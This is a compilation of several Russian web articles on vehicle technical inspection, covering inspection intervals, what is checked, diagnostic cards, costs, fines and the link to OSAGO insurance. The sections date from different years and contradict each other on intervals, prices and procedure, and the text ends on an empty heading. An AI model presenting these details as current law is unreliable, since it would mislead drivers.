Техосмотр для чего он нужен

Для чего нужен техосмотр автомобиля и как его пройти без проблем?

По дорогам нашей страны колесит огромное количество автомобилей, каждый из которых представляет потенциальную опасность для всех окружающих пешеходов и водителей. Далеко не всегда владельцы транспортных средств готовы полностью обслуживать машину, обеспечивать ее безопасность и нормальную эксплуатацию. Именно для этого необходим техосмотр. Контроль технического состояния автомобиля проходит в большей степени для убеждения в том, что авто может продолжать эксплуатироваться по дорогам общего пользования. Но в ГИБДД также подвели под технический осмотр не менее важную юридическую проверку машины.

Очень много разговоров ходит об отмене техосмотра. Эта инициатива то и дело появляется на рассмотрении Думы, но в большинстве случаев даже до нормального голосования дело не доходит. Все прекрасно понимают, что нельзя отменять технический осмотр, ведь иначе на дорогах нашей страны будет ездить транспорт, который даже на утилизацию уже не годится. Сегодня мы рассмотрим все задачи техосмотра, а также дадим несколько советов о том, как без проблем пройти этот процесс.

Главные задачи и функции техосмотра в системе автомобильного контроля

В 2015 году заговорили о том, что техосмотр отменили. Действительно, подобное положение было принято, но избавило оно от процедуры технического контроля только владельцев легковых авто личного пользования не старше 3 лет. Когда машине исполняется три года, следует проходить техосмотр. Если вашей машине от 3 до 7 лет, техосмотр проходит каждые два года. Если же вы ездите на транспорте старше 7 лет, следует выполнять техосмотр ежегодно.

Стоит быть внимательным, ведь сроки прохождения выставляют не по дате выпуска или покупки машины, а по году производства. Если по VIN ваш автомобиль 2013 года, то уже в 2016 вам необходимо проходить технический осмотр. Правда, природа этого осмотра в России сильно изменилась. Сегодня основными функциями этой процедуры будет проверка таких узлов автомобиля:

  • тормозная система — проверка обслуживания и контроль работоспособности тормозов на специальном оборудовании;
  • двигатель и КПП — контроль уровня и качества смазочной жидкости, оценка внешнего состояния, загрязнения;
  • рулевое управление, проверяют люфт рулевого колеса, наличие стука в рейке и наконечниках;
  • работа внешних световых и сигнализационных приборов — поочередно проверяется действие всей иллюминации;
  • исправное функционирование приборов для очистки и омывания лобового стекла, на чем часто попадаются владельцы авто;
  • прочие мелкие требования — к примеру, не допускаются трещины на лобовом стекле в зоне очистки дворником.

Также проверяют зеркала заднего вида, тонировки, наличие и функционирование ремней безопасности. Теперь технический осмотр проходят не в государственных станциях на базе отделений ГИБДД, а в сертифицированных и авторизированных СТО. Их называют операторами технического осмотра, наделили полномочиями проверять все данные функции и сняли с государства необходимость обновления оборудования и содержание штата.

Многие приветствуют такую инициативу, ведь теперь вы можете пройти технический осмотр в любом городе России, заехав на авторизированный сервис. Мало того, вам на этом сервисе могут исправить все неполадки, а затем выдать диагностическую карту. Для водителей такси, автобусов, грузовиков и спецтехники обновление диагностической карты требуется раз в 6 месяцев. Отсутствие актуальной карты будет стоить водителю такой машины 500-800 рублей штрафа.

Особенности современного техосмотра для владельцев легковых авто

Если вы обладаете обычным легковым автомобилем, который не используется в коммерческом аспекте, можете не переживать о техосмотре первые три года. Далее страховая компания не выдаст вам полис ОСАГО, если у вас не будет актуальной диагностической карты. Фактически, процесс проверки техосмотра переложили на страховые компании.

Отсутствие полиса же ведет за собой получение неплохого штрафа. Сотрудники ГИБДД диагностическую карту не проверяют. Также отпала необходимость приклеивать на лобовое стекло какие-либо отметки о прохождении технического осмотра. Карта диагностики потребуется при регистрационных действиях, но она прикрепляется к автомобилю, потому при продаже передается покупателю. Также есть такие тонкости техосмотра для владельцев легковых авто:

  • стоимость в каждом регионе определена по максимальной границе, в среднем цена составляет порядка 800 рублей;
  • сотрудник ГИБДД не может оштрафовать владельца частного авто за отсутствие актуальной диагностической карты;
  • в некоторых случаях возможны проблемы со страховыми выплатами при отсутствии техосмотра;
  • строгость контроля значительно снизилась, потому техосмотром многие стали пренебрегать (и это напрасно);
  • при прохождении техосмотра учитывается заводская конструкция авто, непредусмотренные модули не проверяются;
  • также не пройдет техосмотр машина с самовольно установленной дополнительной оптикой;
  • станции ответственны за выданные диагностические карты, потому купить техосмотр не так просто.

Тем не менее, передача технического осмотра частным компаниям, СТО и специализированным центрам сильно повлияла на либерализацию этого процесса. Теперь можно договориться с не слишком ответственными компаниями о выдаче сертификатов техосмотра даже без визуального осмотра машины. Но такие действия чреваты определенными последствиями как для водителей, так и для сервисных центров с такими черными услугами.

Впрочем, техосмотр с переносом на частные компании стал более качественным. В боязни ответственности и водители, и сервисные центры исправно выполняют государственные требования. С бюджета был снят постоянный источник расходов в виде закупки и ремонта оборудования и прочих важных затрат. А страна получила более свободные правила прохождения техосмотра.

Как получить диагностическую карту быстро и без труда?

Многие водители не желают ехать на техосмотр, ведь это долго, да еще и могут найти какую-нибудь несуществующую неполадку. На самом деле, так происходило, когда техосмотр был прерогативой государственного диагностического центра. Сегодня частные компании заинтересованы в быстрой выдаче сертификата и получении денег. Потому прохождение техосмотра перестало быть процессом с жуткой очередью и потерянным днем или даже двумя. Пройти техосмотр теперь легко может каждый владелец автомобиля после таких простых действий:

  • подготовка автомобиля, самостоятельная проверка определенных особенностей работы всех узлов;
  • определение неполадок, которые могут стать причиной отказа от выдачи диагностической карты;
  • устранение всех проблем, повторная проверка работы органов управления, торможения и прочих функций;
  • поездка в сервис, обладающий правом выдачи диагностических карт государственного образца;
  • прохождение всех необходимых процедур технического осмотра, проведение диагностики машины;
  • получение документов, свидетельствующих о нормальном состоянии транспорта.

На этом эпопей с техническим осмотром заканчивается. Теперь нет необходимости чистить таблички с номерами двигателя и кузова. Эти параметры пригодятся вам только при переоформлении. Техосмотр ставит лишь одну задачу — подтвердить, что ваш автомобиль вполне способен ездить без неполадок и не представляет опасность для других участников движения. Учитывая символическую плату и возможность выбора любого сервиса, вы не потеряете много времени и денег на необходимые процессы. Предлагаем посмотреть репортаж о новых правилах техосмотра:

Подводим итоги

Если вы владеете легковым автомобилем, которым пользуетесь в личных нуждах, то карта диагностики (она же и является единственным документом техосмотра) нужна вам только для получения полиса ОСАГО. Привязав техосмотр к страховке, государственные власти фактически полностью отказались от самостоятельного контроля этих функций. Тем не менее, водители такси и коммерческого транспорта получают неплохие штрафы, если не могут предъявить актуальные диагностические карты.

Потому лучше не рисковать и пройти все необходимые особенности ТО, тем более, эти процедуры не являются каким-то сложным процессом. Достаточно выбрать близкого к вам оператора технического осмотра, получить необходимые услуги и обновить диагностическую карту. Только при наличии такой карты вам выдадут полис обязательного страхования. Если у вас есть опыт прохождения технического осмотра, расскажите о нем в комментариях.

Техосмотр в 2020 году

Добрый день, уважаемый читатель.

Техосмотр — процедура проверки технического состояния транспортного средства, обязательная для всех водителей. В настоящее время прохождение техосмотра требуется для покупки полиса ОСАГО.

Большинство автовладельцев сталкиваются с необходимостью прохождения техосмотра не чаще, чем раз в год. Однако правила проведения осмотров транспортных средств меняются с завидной регулярностью, иногда по несколько раз за год.

В этой статье речь пойдет о том, как пройти техосмотр в 2020 году.

Нужен ли техосмотр в 2019 и 2020 году?

Итак, первый вопрос, волнующий водителей: «Нужно ли проходить техосмотр в 2020 году?». Техосмотр нужен, однако далеко не всем автомобилям. Не следует проходить техосмотр только автомобилям категории B, мототранспортным средствам, прицепам и полуприцепам, возраст которых менее 3-х лет.

Для чего нужен технический осмотр?

Во-первых, технический осмотр нужно пройти для того, чтобы убедиться в безопасности Вашего автомобиля. На техосмотре выявляются неисправности транспортного средства, которые водитель может своевременно исправить.

Во-вторых, нужно пройти техосмотр для ОСАГО. В настоящее время купить полис ОСАГО можно только после прохождения технического осмотра (кроме автомобилей, которым техосмотр не требуется).

Как часто надо проходить техосмотр автомобиля?

Срок действия техосмотра для ОСАГО зависит в первую очередь от типа транспортного средства:

Автомобили категории B, мототранспортные средства, прицепы и полуприцепы — через 3, 5, 7 лет после года выпуска. Далее — каждый год.

Автомобили категории С, учебные автомобили, автомобили оборудованные спецсигналами — каждый год.

Такси, автобусы, грузовики для перевозки людей, автомобили для перевозки опасных грузов — каждые 6 месяцев.

У водителей часто возникает вопрос, нужно ли проходить техосмотр, если машине 3 года. В данном случае техосмотр проходить нужно обязательно, т.к. в противном случае Вам не продадут полис ОСАГО.

Еще один популярный вопрос: «Нужно ли проходить техосмотр на новую машину». Если новый автомобиль относится к категории В, то проходить техосмотр в первые 3 года не нужно.

Рассмотрим таблицу, относящуюся к личным автомобилям категории B:

Сколько стоит техосмотр машины в 2019 году

Стоимость техосмотра в 2019 и 2020 году зависит не только от типа транспортного средства, но и от региона (субъекта федерации), где проводится процедура осмотра.

Например, цена техосмотра легкового автомобиля находится в пределах 300 — 700 рублей, стоимость техосмотра грузовиков 600 — 1000 рублей.

Эта сумма уплачивается непосредственно организации, проводящей осмотр автомобиля. Платить дополнительную госпошлину за техосмотр в 2020 году не требуется.

Поэтому чтобы узнать, сколько стоит техосмотр на территории Вашего региона, рекомендую обратиться к выбранному оператору технического осмотра (позвонить по телефону).

Оплатить техосмотр можно в отделении банка или через специальные платежные терминалы. Для этого нужно выбрать пункт, в котором Вы будете проходить технический осмотр, и узнать его реквизиты для оплаты. Также можно заплатить и в кассе организации.

Пункты технического осмотра

Следующий важный вопрос — где пройти техосмотр? В России несколько тысяч пунктов технического осмотра. Выбрать ближайший к Вашему дому можно в реестре на сайте российского союза автостраховщиков:

Введите название Вашего города и нажмите кнопку «Найти». После этого на экране появится Ваш город с отмеченными пунктами техосмотра. Чтобы получить полную информацию о станции технического осмотра, нажмите на синюю метку на карте.

Отмечу, что пройти техосмотр в настоящее время можно в любом субъекте Российской Федерации. Поэтому если Вы проживаете на границе двух областей, Вы можете выбрать тот пункт, где техосмотр стоит дешевле.

Документы для техосмотра автомобиля

В 2019 году для прохождения техосмотра необходимы следующие документы:

  • Документ, удостоверяющий личность (паспорт или водительское удостоверение).
  • Доверенность, если владелец автомобиля на техосмотре отсутствует.
  • Свидетельство о регистрации или ПТС (если автомобиль не зарегистрирован).

Дополнительные документы оператор требовать от Вас не вправе.

Что нужно для прохождения техосмотра?

Для успешного прохождения техосмотра Вам потребуется технически исправный автомобиль. В связи с этим рекомендую прочитать перечень неисправностей и условий, при которых запрещается эксплуатация транспортных средств. В этом документе описано, что проверяют на техническом осмотре.

Кроме того, есть несколько требований, на которые требуется обратить дополнительное внимание:

  • Аптечка для техосмотра. Аптечка имеет ограниченный срок годности, поэтому перед тем, как ехать на осмотр, проверьте срок годности всех компонентов аптечки.
  • Огнетушитель. Срок годности огнетушителя для техосмотра составляет порядка 5 лет и указывается непосредственно на корпусе. В случае необходимости, огнетушитель нужно заменить.

Если Вы только купили автомобиль, рекомендую купить универсальный набор автомобилиста, который содержит аптечку, огнетушитель, знак аварийной остановки и еще несколько полезных предметов.

Одна из самых популярных причин, по которым автомобиль не проходит техосмотр, — трещина на лобовом стекле. При этом трещина должна располагаться на половине стекла водителя в зоне очистки стеклоочистителя. Если трещина не попадает в данную зону, техосмотр можно пройти и с ней.

Диагностическая карта техосмотра

По результатам прохождения техосмотра выдается диагностическая карта.

Этот документ представляет собой обычный лист формата А4, заполненный с двух сторон и заверенный подписью и печатью оператора технического осмотра.

Пример диагностической карты приведен на рисунке слева. Обычно карта печатается в черно-белом варианте, но иногда попадаются и цветные бланки. Принципиального значения цвет карты не имеет.

Диагностическая карта содержит результаты технического осмотра. Если с автомобилем все в порядке, Вы можете использовать диагностическую карту для покупки полиса ОСАГО.

В противном случае следует устранить неисправности и повторно приехать на техосмотр. Повторная процедура проверки требует отдельной оплаты.

Если у Вас возникают сомнения в подлинности диагностической карты, Вы можете проверить результаты техосмотра по базе ЕАИСТО.

Примечание. Страховая компания при оформлении полиса ОСАГО проверяет диагностическую карту по базе союза автостраховщиков. В связи с этим не стоит пытаться самостоятельно изготовить данный документ, обман будет раскрыт сразу же.

Автовладельцы со стажем еще помнят те времена, когда результаты осмотра оформлялись в виде специального талона, небольшого размера. В 2020 году талоны технического осмотра не выдаются.

Штраф за отсутствие техосмотра

Штраф за езду без техосмотра в настоящее время может быть наложен только на водителя легкового такси, автобуса или грузового автомобиля, предназначенного для перевозок людей, автомобиля для перевозки опасных грузов. Его размер составляет 500 — 800 рублей.

На прочих водителей штраф за отсутствие техосмотра не накладывается, кроме того диагностическую карту возить в автомобиле необязательно.

Тем не менее без техосмотра не удастся купить страховой полис, что повлечет еще один штраф:

Можно ли купить диагностическую карту техосмотра?

Некоторые водители, не уверенные в техническом состоянии своего автомобиля, ищут возможность получить карту техосмотра без проведения осмотра автомобиля.

Не исключаю, что купить техосмотр действительно возможно, однако скорее всего он будет поддельным. Это связано с тем, что при выдаче диагностической карты без проведения осмотра оператор очень сильно рискует. Штраф для него за каждый документ, выданный незаконно, составляет 100 000 — 300 000 рублей. Кроме того, оператор несет ответственность в случае ДТП, возникшего из-за неисправности автомобиля. Так что официальным пунктам техосмотра заниматься «продажей» диагностических карт невыгодно.

На практике купить техосмотр чаще всего предлагают мошенники. Они печатают поддельную карту техосмотра на листе А4, заверяют ее любой печатью и передают водителю. Поддельная карта не проходит проверку по базе ЕАИСТО, поэтому купить полис ОСАГО по ней невозможно.

Так что рекомендую несколько раз подумать перед тем, как купить техосмотр.

В этой статье были рассмотрены все популярные вопросы, связанные с техническим осмотром автомобиля. Однако если у Вас остались какие-то вопросы, можете задать их на форуме ПДД КЛУБ.

Для чего нужен техосмотр автомобиля

Техосмотр отменили – уверенно скажет практически любой автолюбитель, но окажется неправ. На самом деле ТО все так же надо проходить, просто теперь привычный талон отменен и его не проверяют при остановке. Взамен после осмотра выдается карта диагностики. Зачем она нужна, если теперь ее даже не просят инспектора при остановке, мы и расскажем.

Зачем нужен техосмотр

При прохождении технического осмотра делаются соответствующие отметки о том, что он действительно был пройден, в диагностической карте. Существует даже возможность купить эту бумагу, если по каким-либо причинам водитель не хочет пригонять автомобиль для осмотра.

Проходить ТО самостоятельно или покупать его – это, конечно же, дело каждого, но тут нужно понимать, для чего нужен техосмотр вашего автомобиля и почему он так важен. Ведь на самом деле эта процедура направлена на то, чтобы не допустить к езде по дорогам транспорт, который является неисправным и потенциально угрожает безопасности других людей и самого водителя.

На данный момент существуют нелегальные конторы, которые осуществляют продажу поддельных документов. Никто в аккредитованном центре не пойдет вам навстречу, поскольку при выявлении нарушения на него будут наложены существенные санкции в виде штрафа и оплаты суммы последствий за ДТП. Кроме того, если при проверке документа через базу ЕАИСТО страховщик обнаружит, что документ является поддельным, то и ОСАГО оформлено не будет.

Как теперь проводят осмотр

До нововведения 2012 года проведением техосмотра занималась исключительно Госавтоинспекция. На данный момент водитель может выбрать любой ближайший аккредитованный центр, предоставляющий подобные услуги. Обязательно проверяются следующие параметры:

  • светотехническое оснащение;
  • замер техжидкостей;
  • оценка состояния подвески и рулевой колонки на наличие люфтов;
  • проверка дверных замков;
  • замеряется токсичность выделяемых газов из выхлопной трубы;
  • проверяется состояние тормозной системы.

Дополнительно проводится инструментальная диагностика. Еще сотрудник проверит наличие огнетушителя и аптечки.

Действие диагностической карты

Ранее сотрудники могли потребовать вместе с другими документами талон ТО, однако на данный момент в п. 2.1.1 ПДД прописано правило, что законной является только проверка таких бумаг, как страховка, СТС и водительское удостоверение. Получается, что даже если диагностическая карта отсутствует у обычного водителя, за это не назначается никакого штрафа. А вот тем собственникам ТС, для которых ее наличие обязательно, штраф назначают в размере от 500 до 800 рублей, а при повторном нарушении даже могут запретить в дальнейшем эксплуатировать средство до того момента, пока технический осмотр не будет пройден.

На данный момент для легковых машин перепроходить ТО нужно через каждые 2 года, если ему не более 7 лет. Если же ТС больше 7 лет, потребуется ежегодно посещать сервисные центры. Исключение – авто, используемые в качестве такси. Для них предусмотрено правило: проходить технический осмотр каждые полгода.

Если нужно продлить страхование автомобиля, а действие карты вскоре закончится, то в большинстве крупных фирм в оформлении полиса могут отказать. Однако существуют и компании, которые закрывают на это глаза, чтобы выполнить план. Выходит, что даже если завтра диагностическая карта станет недействительной, то при сегодняшнем визите можно будет получить ОСАГО, хоть и не везде.

Нужно или нет заново делать ТО, если автомобиль переоформляется на другое лицо? В этом случае снова получать талон диагностики не нужно. Дело в том, что здесь действуют несколько иные правила. Например, ОСАГО выдается на имя владельца и, соответственно, если собственник меняется, то и полис придется переоформлять. А вот диагностическая карта выдается на само транспортное средство, поэтому ее достаточно просто передать покупателю с другими документами.

Нужно ли проходить техосмотр в случаях, когда он закончился, но страховой полис остается действительным? Эта ситуация тоже оговорена, более того, владелец ТС обязан не просто явиться в диагностический центр, но и сделать это до того, как кончится действие предыдущего документа.

У некоторых водителей возникает вопрос, зачем нужна диагностическая карта, если на руках уже есть ОСАГО. Да и выкраивать время для того, чтобы гнать машину на осмотр, не очень хочется. Но важно помнить, что этот документ фактически является допуском к участию в дорожном движении, подтверждает, что автомобиль безопасен и не станет причиной аварии из-за неисправности. Более подробно о последствиях, которые может повлечь за собой отсутствие этой бумаги, мы рассказали ниже

Что будет, если нет техосмотра при ДТП

Если есть страховка, но действие карты техосмотра окончилось, то страховая фирма, согласно принятому ФЗ «Об обязательном страховании гражданской ответственности», способна выдвинуть к владельцу такого ТС регрессный иск. Произойти такая ситуация может в том случае, когда этот водитель был виновен в произошедшем ДТП и получил за него денежную компенсацию. Но нужно понимать, что описанное правило действительно только для тех собственников машин, для которых в законе прописана обязанность перепроходить диагностику каждые полгода.

Таким же правом обладает страхователь и по отношению к тому пункту техосмотра, которым была выдана диагностическая карта. Подобное возможно в ситуации, когда главной причиной ДТП стала техническая неисправность, тогда как в документе присутствовала пометка о том, что никаких неполадок нет либо они были выявлены, но в карте никаких отметок сделано не было.

Страховка без техосмотра для водителя – это еще и риск того, что компания после дорожного происшествия может отказать в оплате компенсации. Более того, подобный исход в последнее время все чаще вероятен в такой ситуации, поскольку эта возможность тоже прописана в законе. В большинстве городов, если собственник не предоставляет карту диагностики либо срок ее действия вскоре подойдет к концу, ему откажут в оформлении ОСАГО. Это требование уберегает водителей не только от отказа в выплате по страховке или другим подобным проблемам, но и снижает вероятность того, что ДТП произойдет в результате неисправности авто.

Не пренебрегайте обязанностью проходить техосмотр, поскольку это один из гарантов безопасности не только вас, но и пассажиров и пешеходов.

Возможные проблемы

Итак, мы уже поняли, что техосмотр обязательный и без соответствующей бумаги делать нам в страховой компании нечего. Но существуют и автовладельцы, которые могут избежать оформления карты и не тратить время на диагностику машины в специальном центре. Более того, этот способ даже прописан в законе: проходить ТО не нужно собственникам транспорта, который был выпущен менее 3 лет назад.

Однако вы пришли к страховщику и подали все документы, но он утверждает, что технический осмотр все же нужен и что это в ГИБДД срок считают помесячно, а в компании учитывается сразу полный год. Выходит, что даже если машине 2 года и 1 месяц, то получать документ все же нужно? На самом деле в любом случае отсчет срока с даты выпуска автомобиля ведется не только с учетом месяцев, но и с учетом дней, поэтому необходимо потребовать, чтобы сотрудник, оформляющий полисы, предоставил документ, в котором такое правило прописано. А поскольку такового не существует, ОСАГО оформят без диагностической карты.

Небольшая проблема может быть в том случае, когда сразу после прохождения ТО вы отправились к страховщику. Если после проверки сотрудник сказал, что карта диагностики поддельная, то, скорее всего, данные о техосмотре еще не были внесены в базу. Иногда случается так, что даже в оформлении ОСАГО отказывают, ссылаясь на то, что фирмы, выдавшей карту диагностики, нет в каталоге. В случае если вы уверены в том, что технический осмотр был проведен надлежащим образом, лучше просто обратиться в другую страховую компанию.

Задумались, для чего нужен техосмотр автомобиля? Всё о том, зачем производится ТО машины и кто контролирует исполнение этой процедуры

От чего зависит безопасность движения на автодорогах? От знаний и соблюдения ПДД? Грамотного вождения? Да, но не последнюю роль в безопасности движения играет техническое состояние ТС.

На территории РФ действует правило: сотрудники Государственной автоинспекции обязаны контролировать исправность авто с периодичностью, установленной в законодательных актах. Хоть техосмотр и необходим, но многие автовладельцы находят его бесполезной процедурой, да к тому же вызывающей головную боль. Зачем нужен техосмотр?

В специализированные центры всегда очереди, и не представляется возможным пройти ТО быстро. Поэтому покупают «талоны», навлекая на себя гнев ГИБДД и ставя под угрозу жизнь других участников дорожного движения. Стоит ли поступать так?

Дорогие читатели! Наши статьи рассказывают о типовых способах решения юридических вопросов, но каждый случай носит уникальный характер.

Если вы хотите узнать, как решить именно Вашу проблему — просто позвоните, это быстро и бесплатно !

Для чего нужен техосмотр автомобиля?

С 2017 года действует новый порядок ТО. В нормативных документах не изменилась частота прохождения этой процедуры – раз в год.

Еще четыре года назад отменили «талоны», подтверждающие прохождение диагностики. Взамен им ввели диагностические карты с основными пунктами проверки авто. При остановке автомобиля сотрудники полиции не имеют право изучать их.

Их отсутствие – не повод для наложения штрафа (соответствующий пункт отсутствует в КоАП РФ). Зачем в таком случае получать ее? Без нее не выдадут страховой полис, а за его отсутствие штрафуют. Это прописано в п. 3 ст. 15 «Закон об ОСАГО». Лишь владельцы новых авто не переживают: они освобождены от этой процедуры.

По решению властей разрабатывают комплекс программного обеспечения, чтобы страховщики могли контролировать наличие/отсутствие диагностической карты, направляя запросы в базу данных. Как только решение внедрят, количество подделок на рынке резко снизится.

В Постановлении Правительства от 24.05.2011 г. №413 прописаны различные сроки прохождения технического осмотра для автотранспортных средств. Например, раз в три года получают ее на новый легковой авто и раз в 2 года на машины с возрастом до семи лет.

ТС и прицепы к ним, которые используют для перевозки тяжеловесных, крупногабаритных и опасных грузов, подвергают проверке каждые полгода. Срок исчисляют от даты прохождения первого ТО (Постановление Правительства №862 от 31 декабря 2005 года).

Цели и предназначение ТО машины

В пункте 2 Положения о проведении техосмотра рассмотрены все задачи, которые он решает:

  • обеспечение безопасности ТС на дороге посредством тотальной проверки всего оборудования и систем. При ее проведении опираются на требования правил, нормативных актов, стандартов;
  • предоставление допуска водителю к езде по городам и магистралям;
  • предупреждение и пресечение ДТП, административных правонарушений, которые произошли из-за неисправности ТС;
  • выявление неизвестных участников крупных дорожных аварий с жертвами и украденных и перепроданных злоумышленниками авто;
  • оценка показателей состояния безопасности движения на государственном уровне.

Что он дает?

«Талон» о ТО возили вплоть до 1.01.2013 г. Каждый автовладелец возил его с собой во избежание проблем с ГИБДД.

Потом его наличие перестали проверять, перепоручив это нелегкое занятие страховщикам ОСАГО. Без карты нельзя получить страховой полис.

Он не нужен, если авто зарегистрирован ВАИ, состоит на балансе МИД, МВД, Министерств здравоохранения, обороны, юстиции РФ, полиции, прокуратуры и т.д.

Владельцы тракторов, катков с ДВС более пятидесяти куб. см или с электродвигателем с мощностью более 4 кВт., также освобождены от его прохождения.

Автовладельцы рискуют выплатить штраф по уголовному делу за использование поддельных документов. В последнее время страховая компания стала предъявлять регрессивное требование владельцу машины за то, что он вовремя не получил диагностическую карту. Если причина ДТП – неисправность авто, страховщики судятся с оператором техосмотра.

Если до 15.11.2014 г. деятельность операторов ТО не контролировалась, то теперь за выдачу каждой диагностической карты они несут ответственность по закону. Если они не проверяют авто и выдают ее, надеясь на авось, их штрафуют на 100-300 тыс. рублей. Дела, попадающие под эту категорию, рассматривают в суде.

При остановке легкового или грузового автомобиля сотрудники ГИБДД не имеют права знакомиться с диагностической картой. Это теперь не их прерогатива. Это правило не действует в отношении водителей такси, автобусов и авто, перевозящих опасные грузы.

Им надлежит проходить техническую проверку каждые шесть месяцев. Не пройдя ее вовремя, выплачивают штраф в размере пятисот-восьмисот рублей. Такой же штраф надлежит уплатить тем, кто не продлил страховой полис ОСАГО. Действие дорожных полицейских в таком случае законное и отражено в ст. 12.37 ч.2 КоАП РФ.

Заключение

Каждый автовладелец вправе обратиться в любое отделение ГИБДД или в пункт у страховщика, чтобы получить «талон». Главное, чтобы сотрудники центра тщательно изучили техническое состояние авто, проверили его на предмет соответствия всем нормам и правилам.

От того, в каком состоянии находятся тормозная система, двигатель, рулевое управление, коробка передач и т.д., зависит безопасность других участников дорожного движения. Если проблемы не выявят, смело ездят, получив диагностическую карту на руки.

Куда дороже обойдется «приключение» водителям, которые управляют авто с поддельным полисом ОСАГО.

Что нужно для прохождения техосмотра: правила, стоимость

Техосмотр автомобиля – это процесс обязательной проверки транспортного средства, направленный на изучение состояния машины, исправности таковой либо выявления неполадок в ее работе. В текущем году проведение процедуры по-прежнему остается необходимым условием для получения возможности пользоваться средством передвижения. Сроки и порядок процесса строго регламентированы законом.

Для чего нужен техосмотр транспортного средства

Технический осмотр средства передвижения представляет собой комплекс процедур, проводимых для подтверждения исправности автомобиля либо выявления дефектов в его работе.

По окончании проверки состояния автомобиля, на руки владельцу выдается диагностическая карта техосмотра. По сути, процедура требуется не только для выявления недочетов в механизме транспортного средства, но и для получения карты по итогам осмотра. Именно этот документ требуется для заключения договора обязательной страховки и оформления полиса ОСАГО. При отсутствии бумаги автовладельцу будет отказано в возможности страхования гражданской ответственности, соответственно и к эксплуатации автомобиля допуск будет запрещен.

Ранее вместо диагностической карты на руки собственнику машины выдавался технический талон по результатам проверки, проведенной в ГИБДД. Теперь гражданин получает иной документ, где указывается информация по всем пунктам осмотра и прописывается период действия бумаги, включая дату следующей явки в техцентр. Необходимо уточнить, что если на руках автовладельца имеется действующий талон, выданный ранее, то таковой подлежит замене на карту лишь по окончании установленного срока.

Карта диагностики заполняется в двух экземплярах, заверяемых подписью технического специалиста и его печатью. Один из них вручается автовладельцу, второй остается на хранение у эксперта в течение 3-х следующих лет. Кроме того, каждая бумага обладает персональным номером в виде уникальной комбинации цифр. Также создается третий образец диагностической карты – электронный документ. Сведения вносятся в единую базу данных и даже в случае утери бумажного образца, информация не будет утрачена. К тому же наличие электронного экземпляра обеспечивает подлинность карты технического осмотра.

Где можно пройти техосмотр автомобиля

Оценку состояния транспортного средства можно пройти только лишь в аккредитованном сервисном центре. При этом если ранее выдачу лицензии осуществлял Российский Союз Автостраховщиков, то сейчас процедура несколько ужесточилась и процесс попал под контроль органов МВД.

Что касается пунктов технического обслуживания, каждый автовладелец имеет возможность подобрать наиболее выгодно расположенный для него сервис. Достаточно зайти на сайт союза автостраховщиков и изучить список техцентров, ближайших к местонахождению гражданина. Для этого потребуется вбить в поисковой строке конкретный населенный пункт.

Стоит отметить, что пройти процедуру технической проверки теперь возможно в любом регионе страны, независимо от места проживания и регистрации автовладельца.

Правила прохождения техосмотра

Весь процесс технической проверки транспортного средства на исправность регламентирован Законодательством, а точнее Федеральным Законом № 170.

Если говорить более конкретно, положения закона «О техосмотре» регулируют следующие моменты:

  • перечень документов для активации и проведения техосмотра;
  • параметры, на которые должно быть направлено внимание экспертов во время проверки;
  • сроки, по истечении которых требуется следующий визит в техцентр.

Для того чтобы иметь более полное представление о процедуре, следует рассмотреть каждый пункт отдельно.

Список требуемых документов

После выбора сервиса обслуживания, автовладельцу следует позаботиться о наличии ряда документов, обязательных для предъявления эксперту. Отсутствие какой-либо бумаги может послужить мотивом к отказу в процедуре.

Перечень документов включает:

  • паспорт собственника авто;
  • паспорт средства передвижения;
  • регистрационное свидетельство на авто;
  • водительское удостоверение заинтересованного гражданина.

Техосмотр также может пройти иное лицо, выступающее в качестве посредника. В таком случае потребуется оформить доверенность и приложить ее к основному пакету бумаг.

Критерии проверки автомобиля

Законодательными нормами определено 65 пунктов, по которым проводится технический осмотр авто. Основными параметрами проверки являются:

  1. оценка системы тормозов;
  2. колеса, шины;
  3. устройства освещения внешнего порядка;
  4. подвеска и рулевое управление;
  5. двигатель, в частности, осуществляется замер количества вредных веществ, попадаемых в атмосферу при его работе;
  6. топливная система;
  7. очистители и омыватели стекла;
  8. присутствие знака аварийной остановки;
  9. соответствие номерного знака установленным нормам;
  10. исправность дверных замков;
  11. целостность стекол, в частности, это касается лобового стекла – наличие трещины со стороны водителя приведет к отказу в выдаче карты диагностики;
  12. проверка ремней безопасности, зеркал.

Отдельно стоит упомянуть об обязательном наличии в автомобиле аптечки и огнетушителя – при их отсутствии технический осмотр не будет завершен. Аптечка должна содержать полный перечень требуемых элементов с действительным сроком годности. Огнетушитель также обладает периодом действия, который составляет 5 лет.

В случае если технический специалист обнаружил неполадки в механизме средства передвижения, таковые заносятся в карту диагностики и автовладельцу назначается новая дата прохождения осмотра – в течение 20 дней со дня проверки. Повторное посещение потребует оценки лишь ранее выявленных дефектов, но только в том случае, если проверку осуществляет тот же эксперт. Обращение в другой сервис повлечет за собой полноценный техосмотр.

Основной рекомендацией водителям является основательная проверка наличия в салоне машины всех требуемых компонентов, а также устранение серьезных дефектов в работе авто. Еще одним советом считается предварительное посещение автомойки – предоставлять транспортное средство на техосмотр допустимо лишь в чистом виде.

Сроки техосмотра

​Периодичность прохождения техосмотра ясно освещена в законодательстве. На установку сроков, прежде всего, влияет категория транспортного средства и его возраст.

Так, автомобили и иные виды транспорта, чей период эксплуатации не превышает 3-х лет со дня выпуска с производства, в оценке технических характеристик не нуждаются. По истечении 3-х лет и до 7 лет, техосмотр проводится каждые 2 года. Если транспортное средство эксплуатируется более 7 лет, проверка проводится каждый год.

Исключение составляют средства передвижения, чьим предназначением является перевозка граждан – автобусы, легковые такси и прочие. Также в группу входит транспорт для перевоза опасных грузов. Эти виды подлежат обязательной проверке каждые 6 месяцев с момента поступления в работу.

Существует еще одна категория транспорта, подлежащая ежегодному осмотру независимо от возраста. Сюда входят:

  • грузовые авто, разрешенная масса которых составляет 3,5 и более тонн;
  • средства передвижения, оборудованные системой звуковых и световых сигналов, например, машины скорой помощи, пожарные авто;
  • автомобили, предназначенные для обучения граждан вождению.

Сроки, регламентированные законодательно, не являются препятствием к осуществлению желания автовладельца пройти техпроверку заранее по собственной инициативе.

На 2017 год цена за осмотр состояния транспортного средства считается достаточно демократичной, что связано с отменой уплаты государственной пошлины.Средняя стоимость оценки технических характеристик находится в пределах от 300 до 1000 рублей.

В зависимости от региона и категории средства передвижения сумма может несколько изменяться в большую либо меньшую сторону. Окончательный тариф регламентируется органами местной власти субъекта РФ.

Административная ответственность

